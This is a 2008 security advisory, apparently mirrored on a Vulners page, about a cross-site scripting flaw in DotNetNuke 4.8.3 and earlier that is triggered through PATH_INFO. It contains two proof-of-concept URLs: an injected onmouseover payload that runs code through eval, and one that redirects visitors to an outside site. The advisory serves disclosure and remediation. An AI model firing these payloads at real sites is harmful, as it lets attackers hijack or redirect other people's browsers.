Lucene search
K

dotnetnuke-xss.txt

🗓️ 30 May 2008 00:00:00Reported by AmnPardaz Security Research TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Dot Net Nuke (DNN) XSS Vulnerability in version 4.8.3 and prior allows manipulation of "PATH_INFO" in ServerVariables through "/" after the ".aspx" file, posing a low impact risk

Code
`########################## www.BugReport.ir #######################################  
#  
# AmnPardaz Security Research Team  
#  
# Title: Dot Net Nuke (DNN) XSS Vulnerability.  
# Vendor: www.dotnetnuke.com  
# Vulnerable Version: 4.8.3 and prior versions  
# Exploit: N/A  
# Impact: Low  
# Fix: N/A  
# Original Advisory: http://bugreport.ir/index.php?/38  
###################################################################################  
  
####################  
1. Description:  
####################  
DotNetNuke is an open source web application framework ideal for creating, deploying and managing interactive web, intranet and extranet sites.  
  
####################  
2. Vulnerability:  
####################  
XSS in "Default.aspx", by using "/" after the ".aspx" file. We must use another ".aspx" string, before "?" or at end of the URL.  
In fact, "PATH_INFO" in ServerVariables can manipulate by an attacker by entering "/" after the ".aspx" files. So, using "URL" is better than "PATH_INFO".  
  
####################  
3. PoC:  
####################  
- Alert by XSS  
http://[DNN URL]/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx  
  
- Redirect by XSS (We must use a "?" because of using ":" in "HTTP://")  
http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';  
  
####################  
4. Solution:  
####################  
Check the vendor hotfix and use URLScan (http://www.microsoft.com/technet/security/tools/urlscan.mspx).  
  
####################  
5. Credit :  
####################  
AmnPardaz Security Research & Penetration Testing Group  
Contact: admin[4t}bugreport{d0t]ir  
WwW.BugReport.ir  
WwW.AmnPardaz.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
24